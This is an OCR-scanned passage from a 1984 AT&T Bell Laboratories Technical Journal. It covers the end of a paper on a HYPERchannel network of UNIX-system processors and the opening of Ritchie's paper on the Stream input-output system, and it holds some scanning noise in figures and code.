and VAX-11/780* processors dictated a rad- ically different interface and implementation for shared memory. In spite of the differences in compilers and byte orders of processors, the software contains only a few conditional compilation statements that are processor dependent. 3. 1 Operating system environment The UNIX system environment that existed on the network was not uniform. Versions 3.0, 4.2, and 5.0 of the UNIX system (two of these systems are sold commercially as UNIX Systems III and V), or emulations of these systems, were all present on the network. Devel- * Trademark of Digital Equipment Corporation. 294 TECHNICAL JOURNAL, OCTOBER 1984 opment projects usually require that a gradual transition from one version of a system to another exists so that old versions of the operating system lingered on some processors for long periods of time. The following operating system implementations or emulations were part of the network. 3 . 1. 1 The UNIX operating system The initial prototype network software was done for the PDP-11/ 70 computers running UNIX System III. Since native-mode UNIX system implementations* are similar, porting the network software and drivers to the VAX- 11/780 computer was straightforward, but making the implementation work on the VAX-11/780 consumed months of effort because of hardware interface problems. When the UNIX system implementation for the 3B20S computer was available, it was added to the network. This processor has a specialized I/O subsystem and required the design of a new device interface and a structurally different device driver. This development extended over a one-year period. 3.1.2 The UNIX system implementation for System/ 370 An implementation of the UNIX system on IBM 370 processors 4 became an integral part of many of the networks. This UNIX system implementation uses the IBM TSS operating system for the basic kernel, paging, and device management. The UNIX system implemen- tation runs on top of the TSS operating system as a single supervisor managing all user processes as subtasks. Because of the structure of the implementation, the relationship of an ordinary user process to the kernel and device drivers is different from native-mode UNIX system implementations; designing the device driver required the creation of a special pseudo device driver that split responsibilities for managing the interface between TSS and the UNIX system supervisor. 3.1.3 The UNIX RT operating system The UNIX Real-Time (RT) operating system is a message-based implementation of the UNIX system that runs only on PDP-11/70 computers and is of interest for historical reasons and because it is such a radically different emulation of the UNIX system interface. 5 The operating system is partitioned into modules that communicate by means of messages and all device drivers are processes in the * The term “native-mode UNIX system implementation” refers to implementations resulting from porting the UNIX system source to a processor. This is in contrast to an implementation that emulates the UNIX system interface on top of a different operating system (e.g., the UNIX system for System/370). PROCESSOR NETWORK 295 system. The I/O subsystem, file system, and basic processor scheduling were also radically different on this system. Since the UNIX RT system software runs only on PDP-11/70 processors, the hardware interface part of the driver was similar to the UNIX system driver; however, the message protocol that interfaces the driver to the kernel and the semaphores that synchronize the driver required a radically different design of the network control part of the driver. The Duplex Multiple Environment Real Time (DMERT) operating system 6 is a high-reliability derivation of the UNIX RT operating system software and plans are under way to interface the AT&T 3B20D duplex pro- cessor to the network. Figure 1 is a representation of the process structure of each of the operating systems that are on the network. User-level processes are shown in circles by the letter “u” with their relationship to the major modules of the operating system. 3.1.4 Schedulers Even though the UNIX system implementations are similar, the basic scheduling of the CPU was different on each system, and the following dependencies were found. 1. The UNIX system attempts to share the processor among all processes on the system. 7 Since the network supports multiple con- versations, the more conversations that exist in parallel, the greater the percentage of the CPU devoted to networking. Most customers view networking as an adjunct to their system and would prefer to [ | NETWORK ADAPTER £3 DEVICE INTERFACE SOFTWARE (^) USER PROCESS Fig. 1 — UNIX operating system implementations for (a) the standard UNIX system, (b) the UNIX system for IBM System/370, and (c) the UNIX RT operating system. 296 TECHNICAL JOURNAL, OCTOBER 1984 limit networking (and other functions) to a fixed fraction of the CPU. This would require a fair share scheduler based on shares allocated to users rather than processes. 2. The UNIX system for System/370 relies on TSS to schedule jobs and handle interrupts. The TSS scheduler was tuned to run a time- sharing load; however, the tools for manipulating the priority of jobs are crude. 3. The UNIX RT system software gives a high priority to I/O- bound jobs. Initially, this gave the network software higher priority than desired and scheduler changes were made to prevent the network from hogging the processor on several of the heavily used UNIX RT systems. On all systems, the network runs at a slightly higher priority than that of average users to reduce the amount of time that packets linger in adapters. 3.1.5 I/O subsystems The I/O subsystems for the different processors and operating systems are different. The device driver software for different operat- ing system implementations is similar but is not portable. The devel- opment and maintenance of different device drivers was the single most time-consuming aspect of the project. IV. NETWORK ARCHITECTURE The network consists of the HYPERchannel hardware that forms the physical connection between host processors and the host-resident software that implements a batch file transfer service. An overview of these two segments follows. 4. 1 Network hardware architecture The HYPERchannel network is a Carrier Sense Multiple Access (CSMA) network used to interconnect a variety of processors. A good description of the system can be found in Ref. 8. The following sections summarize the major components of the system from a conceptual point of view. 4.1.1 Cable Coaxial cable connects adapters in this network. The cable is not continuous and up to four parallel cables (trunks) can connect adapt- ers. The cable is daisy-chained between adapters as in Fig. 2a. The cables linking adapters together are referred to as trunks. Each trunk is a totally separate communication pathway, so Fig. 2b is a better representation of the interconnection. (Data cannot jump between trunks unless a processor on the network reads the data from the PROCESSOR NETWORK 297 (a) (b) Fig. 2— (a) Daisy-chaining of adapters, (b) Conceptual interconnection of adapters. adapter on one trunk and retransmits it on another trunk.) The trunk usage is managed solely by the adapters and is of no concern to the user. 4. 1.2 Adapters The adapters connect processors to the network and execute trans- fers between adapters. The design of all adapter models is fundamen- tally the same; each model has different microcode, depending on the type of processor connected to it. Figure 3 illustrates that a minicom- puter adapter can have four different processors attached to the same adapter, while only one processor may be connected to a mainframe AT&T 3B20S MINICOMPUTER ADAPTER (^) MINICOMPUTER Fig. 3 — Simple HYPERchannel local area network. 298 TECHNICAL JOURNAL, OCTOBER 1984 adapter. Figure 4 is a simplification of the internal structure of an adapter. Each adapter contains 1. A 4K-byte data buffer 2. A small buffer area for messages 3. A high-speed microprocessor 4. Circuits for transmitting and receiving data on trunks 5. Circuits for transmitting data to the processor. 4. 1.2. 1 Processor to processor transfers. A transfer is outlined below. 1. Requests to transmit data across the network are generated by a user and queued (see Fig. 5). 2. A request for service is initiated by processor 1 (Fig. 5, line a). To do this, processor 1 must first get the attention of its own adapter (Fig. 5, line b). This is a significant point because the adapter has only one data buffer. The adapter is a half-duplex device; that is, while the buffer is being used to transmit data, the adapter is busy and cannot receive data. Similarly, the adapter cannot transmit data if a data packet has arrived. This half-duplex nature of the microcode in the adapter gives an implied preference for received data and makes the device software for the adapter complicated. 3. Once the adapter has accepted the request to transfer from processor 1, it executes a reservation protocol to reserve the remote adapter and transmits the data (Fig. 5, line c). 4. At the remote adapter, an interrupt is generated to notify pro- cessor 2 that data have arrived (Fig. 5, line d). Processor 2 then unloads the adapter (by means of direct-memory access) and stores the received data. (An important parameter here is how long it takes processor 2 to schedule a user job to unload the adapter. The network software runs at a high priority but since the UNIX system is a time- PROCESSOR INTERFACE MESSAGE BUFFERS DATA BUFFER MICROPROCESSOR TRUNK 0 TRUNK 1 TRUNK 2 TRUNK 3 Fig. 4 — HYPERchannel adapter. PROCESSOR NETWORK 299 Q) PROCESSOR Q ADAPTER USER PROCESS Fig. 5— Processor-to-processor transfers. sharing system, the data could remain in the adapter for several seconds or minutes on a heavily loaded system. The length of time data sit in an adapter is important because no other data can be transmitted or received on that adapter until the data are unloaded.) 4 . 1.2.2 Link adapters. Link adapters are a pair of adapters that allow two local area networks to be joined together and appear as one. Figure 6 shows link adapters connecting two networks. One link adapter is placed on each network. Several different types of transmission media are available for carrying data between the link adapters. Fiber optic lines and 56-kb private lines have been used successfully at various AT&T locations. The following should be noted: 1. When link adapters are used, the network appears as one large network. 2. The link adapters operate as half-duplex devices since there is only one buffer in each adapter. Low-speed transmission lines produce major bottlenecks within the network; therefore, high-speed media (fiber optics, Tl, or microwave) should be used. 4.2 Networking software architecture The networking software is divided into three distinct layers: 1. A service layer that consists of user-level commands (nusend) to initiate the file transfer process; in addition, it contains commands (nscstat , nscioop), which query the state of the network. 300 TECHNICAL JOURNAL, OCTOBER 1984 NETWORK A Fig. 6 — Interconnection of local area networks using link adapters. 2. A session layer that provides agreements between processors for file transfer and remote execution (nscd, nsclisten, nscrecv). 3. A link layer that provides for reliable transmission of data between systems (nscsend, nscread). Each of these layers, as well as the interactions between layers, is discussed in the following sections. The structure of the architecture as well as the communication between layers is illustrated in Fig. 7. 4.2. 1 Service layer The user initiates a file transfer with the nusend command; this command queues the request by creating a Job Control Language (JCL) file on disk, which contains all information necessary to deliver the requested files to the destination system. The nusend command nusend nscloop nscstat nscd nscrecv nsclisten nscread nscsend NSC ADAPTERS Fig. 7 — Network processes and the protocol layers they implement. PROCESSOR NETWORK 301 informs the session layer that new work has arrived by attempting to execute the file transfer daemon nscd. 4.2.2 Session layer The session layer packetizes user data files and arranges for their transfer over the network. This file transfer protocol is implemented using three processes: 1. nscd — the file transfer daemon 2. nsclisten — a listener process that waits for incoming requests 3. nscrecv — the file receive daemon. The session layer communicates with the link layer through UNIX system pipes and signals. It receives work from the service layer by reading the JCL files created by nusend and sending mail to the user on completion. 4.2.2. 1 Nscd. Nscd reads the JCL files created by nusend to deter- mine what work is to be performed. It is responsible for: 1. Establishing a connection to the destination system specified in the JCL file 2. Sending and receiving session layer control packets that control the file transfer 3. Reading user data files from disk and forming packets to be sent over the network (by means of the link layer). Nscd initiates a conversation by issuing a connection request to the nsclisten process on the remote machine. This results in a nscrecv daemon process being spawned on the destination machine to handle the actual file transfer. 4.2.2.2 Nsclisten. The listen process, nsclisten, accepts calls from remote nscd processes and spawns the file transfer receive daemon, nscrecv, to receive the file from the remote. The listener process is used to implement an “active” network; that is, each nsclisten process sends I am alive messages to its peer nsclisten process on each host on the network at a low frequency. 4. 2. 2. 3 Nscrecv. Nscrecv is the file transfer receiving daemon. It is responsible for: 1. Completing the connection request that was initiated by the file transfer daemon (nscd) 2. Implementing the file transfer protocol in cooperation with the sending process on the remote host 3. Receiving the user data files, delivering them to the user, and acknowledging their reception. 4.2.3 Link layer The link layer performs the synchronization of host-to-host corn- 302 TECHNICAL JOURNAL, OCTOBER 1984 munications and provides flow control on a per packet basis. The layer consists of two processes: 1. ns c send — reads data from the session layer and arranges for its transmission over the network 2. nscread — reads data from the network and passes data to the session layer. This two-process structure is used to simulate asynchronous I/O, a feature that is not currently available under the UNIX system. V. USER INTERFACE TO THE NETWORK The nusend command provides the user interface to the network for both file transfer and remote command execution. The syntax is a carryover of a syntax originally developed to simulate file transfer between UNIX systems by means of the Remote Job Entry subsystem. 5 . 1 File transfer The nusend command enables the user to transfer a file across the network. For example, the command nusend -d mhtsa file sends file to system mhtsa. This command places the file in a default directory on the desti- nation system. Options to the command allow the specification of a fully qualified path name for the destination file or delivery to a different user on the remote system. Many users of the network are never aware of the network software. Rather, they invoke standard utilities that have been modified to invoke the network software. For example, the standard means for spooling a job to the line printer pr file | lp may actually use the network if the local administrator has replaced the standard line printer spooler (LP) with a command to transfer files to a printer on a remote system. On many systems the mail command has been modified to forward mail to other systems on the network rather than through the slower uucp mechanism. 5.2 Remote command execution The nusend command also provides the user with a mechanism for remote batch command execution. Any command, either a standard UNIX system command or a user’s own program, can be executed using this facility; any output from the executed command may be PROCESSOR NETWORK 303 placed optionally in a file on the remote system or returned to the user’s local system. VI. USAGE The oldest and largest of the networks (see Fig. 8) has been in full production for approximately three years. The uses of the network at this point fall into the following broad categories: 1. Functional units — With the variety of processors and operating system implementations available on the network, specialization of systems among some projects has occurred. Implementations of the UNIX system running on IBM 3033AP and 3081K configurations are much faster than minicomputers, and because of their speed and large address space they have been used for such tasks as load building and source management. Other processors have been dedicated for lab support, source development, and testing (see Fig. 9). 2. Off-loading — This most often takes the form of spooling output to systems that have extensive print facilities. However, some experi- ments have been made in off-loading heavy CPU-bound and I/O- bound jobs, such as text processing, onto back-end machines. 3. Messaging — The UNIX system mail facility uses uucp to send mail to other systems. Some sites have modified uucp and mail to use the local area network for local deliveries, and use the dial-up network to mail to remote systems. 4. System administration — Several computer centers have imple- mented network-wide password file administration, software distri- bution, accounting, maintenance, and general processor status moni- toring by using the network. Even though the interface to the network is batch oriented, the high speed and low queuing times for jobs allows a single system administrator on one system to monitor many proces- sors in one or more computer centers. 5. Site interconnection — Use of link adapters allows processors in different buildings to be connected by means of fiber optics, microwave or private lines, thereby extending the domain of the local area network. 6.1 Throughput Due to the differences in speed of the processors on the network, the throughput of network transfers varies considerably. Although the raw speed of the HYPERchannel is 50 Mb/s, a file transfer consists of more than the raw exchange of data. The CPU speed, I/O transfer rate, and disk speed of the systems involved dominates the file transfer rate; the use of UNIX system pipes and multiple processes to establish a conversation also limits the maximum bandwidth of transfers. Net- work traffic, general user load on the connecting systems involved in 304 TECHNICAL JOURNAL, OCTOBER 1984 MAINFRAME ADAPTER MINICOMPUTER ADAPTER LINK ADAPTER 0 MINICOMPUTER (AT&T 3B20S, VAX-11, OR PDP-11/70 COMPUTER) MAINFRAME COMPUTER (IBM 370, 3033, 3081, ETC.) Fig. 8— An actual local area network. SOURCE DEVELOPERS □ ADAPTER o MINICOMPUTER MAINFRAME COMPUTER Fig. 9 — Functional units in a development lab. the file transfer, and contention at the adapter interfaces between minicomputers also place constraints on the transfer rate. On lightly loaded systems, transfer speeds range from 20K bytes/s between 16-bit minicomputers up to 200K bytes/s for transfers be- tween large mainframes. Average transfer rates are usually lower since many of the files transferred over the network are small (less than 10K bytes) and setup time for each job dominates the transfer. In general, files are queued for only a short period of time so user satisfaction is high. Most files (less than 100K bytes) are usually queued and transmitted in a shorter time frame than the user can log onto the remote system. Table I summarizes file transfer rates between the different computer types currently supported on the network. Table I — Nusend performance on lightly loaded UNIX systems Destination Host Computer Sending Host Computer AT&T 3B20S VAX- 11/780 PDP- 11/70 IBM 3033 IBM 3081K AT&T 3B20S 60* 50 40 70 C) 75 f VAX-11/780 50 50 40 60 70 PDP-11/70 40 40 20 40 40 IBM 3033 75 60 50 120 150 IBM 308 IK 80 70 50 150 200 f * All rates are in K bytes/s f Projected rate 306 TECHNICAL JOURNAL, OCTOBER 1984 6.2 Network reliability In the initial stages of development, the reliability of the network was marginal because of both hardware and software problems. When a new type of processor (e.g., the IBM 370) joined the network, new problems were uncovered between processors that run at different speeds and with different byte ordering. For the past three years all the networks have been in production use with high availability. VII. LESSONS From the process of developing the network software packages and the usage patterns of the community of users that the networks serve, several lessons were learned. 7.1 Portability Using a common language (in this case C language) and a common UNIX system environment on all processors reduced both the amount of development staff needed and the debugging effort. The fact that not all systems ran the latest version of UNIX software had little impact on the software since the versions of the UNIX system were upward-compatible. However, developers had to make a conscious effort to write in a subset of C to assure that new modules would be portable. In porting a network implementation to several radically different UNIX system implementations, it was realized that some applications such as networking uncover hidden assumptions about what constitutes a standard UNIX system environment. The structure of processes and their relationships to the system, each other, and devices influence the portability of the system. The flow of data from user processes through the system and the way that the operating system treats processes with these characteristics can infuence both the design and portability of a network package. 7.2 Administration Designing the right administrative tools for the network is difficult, and there is only limited experience with the uses that customers make of the network to provide good models. However, from usage to date, it appears that knowledge of the state of remote systems is valuable feedback for users. In a time-sharing environment, good network monitoring tools provide a feedback mechanism to users who are usually unwilling to queue a file transfer to a system that is not actively accepting transfers. This also helps in reducing congestion and queuing problems. For adminstrators, using the network to broadcast updated source and object modules makes ordinary administrative tasks easier. Mi- grating users between systems is a common practice when a commu- PROCESSOR NETWORK 307 nity of systems is being load balanced, and the network makes this trivial. The need for a common password file, standard commands and environments, and standard locations for source and object modules becomes imperative. Tracing and accounting facilities in the network software are essential for debugging and isolation of problems. The distribution and automatic installation of network software revisions were addressed with only a limited amount of success. Here it was found that certain classes of updates of the network software required shutting down large regions or the entire network. 7.3 Compatibility Providing a package that runs on different operating systems or on different implementations of the same operating system imposes many design constraints and creates pressure to get basic protocols and functionality right the first time. Retrofitting a large network with new features that require protocol changes is something that should be avoided but planned for as part of the protocols. 7.4 Peer pressure When different processors run a standard operating system on a network, users are quick to make comparisons between systems. A positive result is that this often generates pressure to improve each of the implementations. Sometimes, however, such comparisons cause users with large applications to migrate their work to faster machines. Comparisons between processors that are orders of magnitude differ- ent in power (VAX and 3033AP) must also factor in the cost per user of the equipment. VIII. CONCLUSION We can see how a standard operating system environment can simplify the development of network software that is to run across a variety of processors with different instruction sets and byte orders. The more radically different the implementation of the operating system, the more difficult the porting of a network implementation is. However, the differences can be confined to the device interface. The portability that a standard environment offers allows development to be concentrated on reliability, functionality, and performance of the network. The savings in maintenance, training, and distribution of common source for all processors is incalculable. A surprising outcome of the work is that a network solution origi- nally intended to provide an interim capability for prototyping more ambitious services is enjoying an extended lifetime since it satisfies most of the users’ currently perceived needs (high throughput and low queuing time). It is believed that this has occurred because of the 308 TECHNICAL JOURNAL, OCTOBER 1984 relatively low expectations of users concerning machine-to-machine communication. As such, the confidence gained by users in using a reliable high-speed network and the experience gained in dealing with the administrative problems of the network will be invaluable in the future. IX. ACKNOWLEDGMENTS Many people have contributed to the construction of the HYPER- channel networks throughout AT&T Bell Laboratories. In particular, Jeff Kinker, Tom Fisher, Joe Hall, Tom Giamaressi, Mick McKillip, Chuck Borcher, Ian Johnstone, Sherry Shulman, Kang Yueh, John Puttress, and a number of others have contributed a great deal of time and expertise to the development of the network. REFERENCES 1. D. A. Nowitz and M. E. Lesk, “Implementation of a Dial-Up Network of UNIX Systems,” Fall 1980 COMPCON, Washington, D.C., pp. 483-6. 2. C. J. Antonelli, L. S. Hamilton, P. M. Lu, J. J. Wallace, and K. Yueh, “SDS/NET— An Interactive Distributed Operating System,” Fall 1980 COMPCON, Washing- ton, D.C., pp. 487-93. 3. J. E. Allers, S. T. Hamilton, and J. A. Kukla, “The 5 ESS™ Switching System: Robust and Ready for Change,” Bell Lab. Rec., 61, No. 5 (May-June 1983), pp. 4-9. 4. W. A. Felton, G. L. Miller, and J. M. Milner, “The UNIX System: A UNIX System Implementation for System/370,” AT&T Bell Lab. Tech. J., this issue. 5. H. Lycklama and D. L. Bayer, “ UNIX Time-Sharing System: The MERT Operating System,” B.S.T.J., 57, No. 6 (July- August 1978), pp. 2049-86. 6. M. E. Grezelakowski, J. H. Campbell, and M. R. Dubman, “The 3B20D Processor & DMERT Operating System: DMERT Operating System,” B.S.T.J., 62, No. 1, Part 2 (January 1983), pp. 303-22. 7. T. M. Raleigh, “Introduction to Scheduling and Switching under UNIX,” Spring 1976, DECUS Atlanta, GA, pp. 867-77. 8. Network Systems Corporation, “NSC HYPERchannel System Description,” Net- work Systems Corp., 7600 Boone Ave. N., Minneapolis, MN 55428. AUTHORS Thomas E. Fritz, B.S. (Chemistry), 1976, Moravian College; M.S. (Computer Science), 1979, Iowa State University; AT&T Bell Laboratories, 1979 — . Mr. Fritz has been involved with the design and development of UNIX system networking products, including work on the HYPERchannel software and the AT&T 3B20S interface to the HYPERchannel. He is currently a member of the UNIX Systems Development department. Joseph E. Hefner, B.E.E., 1969, University of Dayton; M.S. (Bioengineer- ing), 1976, Polytechnic Institute of Brooklyn; Sperry Rand Corporation, 1969- 1976; U. S. Naval Systems Center, 1976-1982; AT&T Bell Laboratories, 1982 — . From 1969 to 1982 Mr. Hefner was involved with systems engineering and software development for submarine navigation and sonar systems, both as an employee of Sperry Systems Management Division of Sperry Rand and as a civilian employee of the U. S. Navy at a research and development laboratory in New London, Connecticut. In 1982 he joined the technical staff at AT&T Bell Laboratories in support of UNIX system networking developing. PROCESSOR NETWORK 309 Mr. Hefner worked on the HYPERchannel software and other UNIX net- working products. He is currently working in the UNIX Systems Development department. Thomas M. Raleigh, B.S.E.E. (Electrical Engineering), 1970, The Cooper Union; M.S.E.E.C.S., 1971, University of California at Berkeley; AT&T Bell Laboratories, 1971-1983. Present affiliation Bell Communications Research, Inc. Mr. Raleigh joined AT&T Bell Laboratories in 1971 where he initially worked on a multiprocessor missile flight simulator for the Safeguard project. In 1973, he joined the initial development group for the UNIX operating system. In 1977, he became responsible for the development of the UNIX Real-Time (RT) operating system software, a precursor to the DMERT (UNIX Real-Time Response [RTR]) operating system. Since 1979, Mr. Ra- leigh has supervised groups responsible for UNIX operating system design, local area networks, real-time operating systems, and paging operating sys- tems. In 1983, he joined Bell Communications Research as a District Manager in charge of Distributed Computing Research, where his interests are in multiple microprocessor operating systems. 310 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: A Stream Input-Output System By D. M. RITCHIE* (Manuscript received October 18, 1983) In a new version of the UNIX ™ operating system, a flexible-coroutine-based design replaces the traditional rigid connection between processes and termi- nals or networks. Processing modules may be inserted dynamically into the stream that connects a user’s program to a device. Programs may also connect directly to programs, providing interprocess communication. I. INTRODUCTION The part of the UNIX operating system that deals with terminals and other character devices has always been complicated. In recent versions of the system it has become even more so, for two reasons. 1. Network connections require protocols more ornate than are easily accommodated in the existing structure. A notion of “line disciplines” was only partially successful, mostly because in the tra- ditional system only one line discipline can be active at a time. 2. The fundamental data structure of the traditional character I/O system, a queue of individual characters (the “clist”), is costly because it accepts and dispenses characters one at a time. Attempts * AT&T Beil Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information -service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 311 to avoid overhead by bypassing the mechanism entirely or by intro- ducing ad hoc routines succeeded in speeding up the code at the expense of regularity. Patchwork solutions to specific problems were destroying the modu- larity of this part of the system. The time was ripe to redo the whole thing. This paper describes the new organization. The system described here runs on about 20 machines in the Information Sciences Research Division of AT&T Bell Laboratories. Although the system is being investigated in other parts of AT&T Bell Laboratories, it is not generally available. II. OVERVIEW This section summarizes the nomenclature, components, and mech- anisms of the new I/O system. 2.1 Streams A stream is a full-duplex connection between a user’s process and a device or pseudo-device. It consists of several linearly connected processing modules, and is analogous to a shell pipeline, except that data flows in both directions. The modules in a stream communicate almost exclusively by passing messages to their neighbors. Except for some conventional variables used for flow control, modules do not require access to the storage of their neighbors. Moreover, a module provides only one entry point to each neighbor, namely a routine that accepts messages. At the end of the stream closest to the process is a set of routines that provide the interface to the rest of the system. A user’s write and I/O control requests are turned into messages sent to the stream, and read requests take data from the stream and pass it to the user. At the other end of the stream is a device driver module. Here, data arriving from the stream is sent to the device; characters and state transitions detected by the device are composed into messages and sent into the stream towards the user program. Intermediate modules process the messages in various ways. The two end modules in a stream become connected automatically when the device is opened; intermediate modules are attached dynam- ically by request of the user’s program. Stream processing modules are symmetrical; their read and write interfaces are identical. 2.2 Queues Each stream processing module consists of a pair of queues , one for each direction. A queue comprises not only a data queue proper, but also two routines and some status information. One routine is the put 312 TECHNICAL JOURNAL, OCTOBER 1984 procedure , which is called by its neighbor to place messages on the data queue. The other, the service procedure, is scheduled to execute whenever there is work for it to do. The status information includes a pointer to the next queue downstream, various flags, and a pointer to additional state information required by the instantiation of the queue. Queues are allocated in such a way that the routines associated with one half of a stream module may find the queue associated with the other half. (This is used, for example, in generating echos for terminal input.) 2.3 Message blocks The objects passed between queues are blocks obtained from an allocator. Each contains a read pointer, a write pointer, and a limit pointer, which specify respectively the beginning of information being passed, its end, and a bound on the extent to which the write pointer may be increased. The header of a block specifies its type; the most common blocks contain data. There are also control blocks of various kinds, all with the same form as data blocks and obtained from the same allocator. For example, there are control blocks to introduce delimiters into the data stream, to pass user I/O control requests, and to announce special conditions such as line break and carrier loss on terminal devices. Although data blocks arrive in discrete units at the processing modules, boundaries between them are semantically insignificant; standard subroutines may try to coalesce adjacent data blocks in the same queue. Control blocks, however, are never coalesced. 2.4 Scheduling Although each queue module behaves in some ways like a separate process, it is not a real process; the system saves no state information for a queue module that is not running. In particular queue processing routines do not block when they cannot proceed, but must explicitly return control. A queue may be enabled by mechanisms described below. When a queue becomes enabled, the system will, as soon as convenient, call its service procedure entry, which removes successive blocks from the associated data queue, processes them, and places them on the next queue by calling its put procedure. When there are no more blocks to process, or when the next queue becomes full, the service procedure returns to the system. Any special state information must be saved explicitly. Standard routines make enabling of queue modules largely auto- matic. For example, the routine that puts a block on a queue enables the queue service routine if the queue was empty. STREAM INPUT-OUTPUT SYSTEM 313 USER DEVICE WRITE USER READ OUT DEVICE IN Fig. 1 — Configuration after device open. 2.5 Flow control Associated with each queue is a pair of numbers used for flow control. A high-water mark limits the amount of data that may be outstanding in the queue; by convention, modules do not place data on a queue above its limit. A low-water mark is used for scheduling in this way: when a queue has exceeded its high-water mark, a flag is set. Then, when the routine that takes blocks from a data queue notices that this flag is set and that the queue has dropped below the low- water mark, the queue upstream of this one is enabled. III. SIMPLE EXAMPLES Figure 1 depicts a stream device that has just been opened. The top- level routines, drawn as a pair of half-open rectangles on the left, are invoked by users’ read and write calls. The writer routine sends messages to the device driver shown on the right. Data arriving from the device is composed into messages sent to the top-level reader routine, which returns the data to the user process when it executes read. Figure 2 shows an ordinary terminal connected by an RS-232 line. Here a processing module (the pair of rectangles in the middle) is interposed; it performs the services necessary to make terminals usable, for example echoing, character-erase and line-kill, tab expan- sion as required, and translation between carriage-return and new- line. It is possible to use one of several terminal handling modules. The standard one provides services like those of the Seventh Edition system; 1 another resembles the Berkeley “new tty” driver. 2 The processing modules in a stream are thought of as a stack whose top (shown here on the left) is next to the user program. Thus, to USER DEVICE^ WRITE OUT USER TTV i M i DEVICE ~ READ i 1 y ini IN Fig. 2 — Configuration for normal terminal attachment. 314 TECHNICAL JOURNAL, OCTOBER 1984 USER DEVICE WRITE USER READ TTY OUT TTY IN PROTO OUT PROTO IN Fig. 3 — Configuration for network terminals. OUT DEVICE IN install the terminal processing module after opening a terminal device, the program that makes such connections executes a “push” I/O control call naming the relevant stream and the desired processing module. Other primitives pop a module from the stack and determine the name of the topmost module. Most of the machines using the version of the operating system described here are connected to a network based on the Datakit ™ packet switch. 3 Although there is a variety of host interfaces to the network, most of ours are primitive, and require network protocols to be conducted by the host machine, rather than by a front-end proces- sor. Therefore, when terminals are connected to a host through the network, a setup like that shown in Fig. 3 is used; the terminal processing module is stacked on the network protocol module. Again, there is a choice of protocol modules, both a current standard and an older protocol that is being phased out. A common fourth configuration (not illustrated) is used when the network is used for file transfers or other purposes when terminal processing is not needed. It simply omits the “tty” module and uses only the protocol module. Some of our machines, on the other hand, have front-end processors programmed to conduct standard network protocol. Here a connection for remote file transfer will resemble that of Fig. 1, because the protocol is handled outside the operating system; likewise network terminal connections via the front end will be han- dled as shown in Fig. 2. IV. MESSAGES Most of the messages between modules contain data. The allocator that dispenses message blocks takes an argument specifying the small- est block its caller is willing to accept. The current allocator maintains an inventory of blocks 4, 16, 64, and 1024 characters long. Modules that allocate blocks choose a size by balancing space loss in block linkage overhead against unused space in the block. For example, the top-level write routine requests either 64- or 1024-character blocks, because such calls usually transmit many characters; the network input routine allocates 16-byte blocks because data arrives in packets STREAM INPUT-OUTPUT SYSTEM 315 of that size. The smallest blocks are used only to carry arguments to the control messages discussed below. Besides data blocks, there are also several kinds of control messages. The following messages are queued along with data messages in order to ensure that their effect occurs at the appropriate time. break is generated by a terminal device on detection of a line break signal. The standard terminal input processor turns this message into an interrupt request. It may also be sent to a terminal device driver to cause it to generate a break on the output line. hangup is generated by a device when its remote connection drops. When the message arrives at the top level it is turned into an interrupt to the process, and it also marks the stream so that further attempts to use it return errors. delim is a delimiter in the data. Most of the stream I/O system is prepared to provide true streams, in which record boundaries are insignificant, but there are various situations in which it is desirable to delimit the data. For example, terminal input is read a line at a time; delim is generated by the terminal input processor to demarcate lines. delay tells terminal drivers to generate a real-time delay on output; it allows time for slow terminals to react to characters previ- ously sent. ioctl messages are generated by users’ ioctl system calls. The relevant parameters are gathered at the top level, and if the request is not understood there, it and its parameters are composed into a message and sent down the stream. The first module that understands the particular request acts on it and returns a positive acknowledgment. Intermediate modules that do not recognize a particular ioctl request pass it on; stream-end modules return a negative acknowledgment. The top-level routine waits for the acknowledgment, and returns any information it carries to the user. Other control messages are asynchronous and jump over queued data and nonpriority control messages. iocack acknowledge ioctl messages. The device end of a stream iocnak must respond with one of these messages; the top level will eventually time out if no response is received. signal messages are generated by the terminal processing module and cause the top level to generate process signals such as quit and interrupt. 316 TECHNICAL JOURNAL, OCTOBER 1984 FLUSH messages are used to throw away data from input and output queues after a signal or on request of the user. stop messages are used by the terminal processor to halt and start restart output by a device, for example to implement the traditional control-S/control-Q (X-on/X-off) flow control mechanism. V. QUEUE MECHANISMS AND INTERFACES Associated with each direction of a full-duplex stream module is a queue data structure with the following form (somewhat simplified for exposition), struct queue { int flag; A flag bits ♦/ void ( *putp ) ( ) ; /* put procedure ♦/ void ( ♦servp ) ( ) ; h service procedure ♦/ struct queue *next; /* next queue downstream ♦/ struct block *first; h first data block on queue ♦/ struct block ♦last; h last data block on queue ♦/ int hiwater ; h max characters on queue ♦/ int lowater ; /* wakeup point as queue drains ♦/ int count ; /* characters now on queue ♦/ void ♦ptr; h pointer to private storage ♦/ The flag word contains several bits used by low-level routines to control scheduling: they show whether the downstream module wishes read data, or the upstream module wishes to write, or the queue is already enabled. One bit is examined by the upstream module; it tells whether this queue is full. The first and last members point to the head and tail of a singly linked list of data and control blocks that form the queue proper; hiwater and lowater are initialized when the queue is created, and when compared against count, the current size of the queue, determine whether the queue is full and whether it has emptied sufficiently to enable a blocked writer. The ptr member stores an untyped pointer that may be used by the queue module to keep track of the location of storage private to itself. For example, each instantiation of the terminal processing module maintains a structure containing various mode bits and special char- acters; it stores a pointer to this structure here. The type of ptr is artificial. It should be a union of pointers to each possible module state structure. Stream processing modules are written in one of two general styles. STREAM INPUT-OUTPUT SYSTEM 317 In the simpler kind, the queue module acts nearly as a classical coroutine. When it is instantiated, it sets its put procedure putp to a system-supplied default routine, and supplies a service procedure servp. Its upstream module disposes of blocks by calling this module’s putp routine, which places the block on this module’s queue (by manipulating the first and last pointers). The standard put pro- cedure also enables the current module; a short time later the current module’s service procedure servp is called by the scheduler. In pseu- docode, the outline of a typical service routine is: service ( q ) struct queue *q while ( q is not empty and q— >next is not f ull ) { get a block from q process message block call q— mext— »putp to dispose of new or transformed block This mechanism is appropriate in cases in which messages can be processed independently of each other. For example, it is used by the terminal output module. All the scheduling details are taken care of by standard routines. More complicated modules need finer control over scheduling. A good example is terminal input. Here the device module upstream produces characters, usually one at a time, that must be gathered into a line to allow for character erase and kill processing. Therefore the stream input module provides a put procedure to be called by the device driver or other module downstream from it; here is an outline of this 